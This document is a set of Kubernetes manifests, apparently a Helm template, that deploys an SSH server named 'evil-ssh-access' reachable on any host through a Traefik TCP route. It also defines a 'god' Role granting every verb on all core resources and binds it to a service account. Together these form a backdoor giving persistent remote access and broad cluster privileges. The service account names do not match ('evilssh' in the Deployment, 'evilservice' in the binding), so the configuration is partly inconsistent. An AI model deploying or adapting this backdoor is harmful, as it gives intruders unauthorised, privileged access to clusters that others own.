---
apiVersion: v1
kind: Service
metadata:
  name: evilssh
spec:
  type: ClusterIP
  ports:
  - port: 2223
    targetPort: ssh
    protocol: TCP
    name: ssh
  selector:
    app: evilssh
---
apiVersion: traefik.containo.us/v1alpha1
kind: IngressRouteTCP
metadata:
  name: ingressroute.tcp
spec:
  entryPoints:
    - ssh
  routes:
  - match: HostSNI(`*`)
    services:
      - name: evilssh
        port: 2223
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: evil-ssh-access
  labels:
    app: evilssh
spec:
  replicas: 1
  selector:
    matchLabels:
      app: evilssh
  template:
    metadata:
      labels:
        app: evilssh
      annotations:
        ssh-config: {{ include (print "./config/ssh-config.yaml") . | sha256sum }}
    spec:
      containers:
      - name: ssh
        image: linuxserver/openssh-server:latest
        ports:
        - name: ssh
          containerPort: 2223
        envFrom:
        - configMapRef:
            name: ssh-config
        volumeMounts:
        - name: pubkeys-volume
          mountPath: /pub_keys
      volumes:
      - name: pubkeys-volume
        configMap:
          name: ssh-pubkeys
    serviceAccountName: evilssh
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: god
rules:
- apiGroups: [""]
  resources: ["*"]
  verbs: ["*"]
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: god-rolebinding
roleRef:
  kind: Role
  name: god
  apiGroup: rbac.authorization.k8s.io
subjects:
- kind: ServiceAccount
  name: evilservice

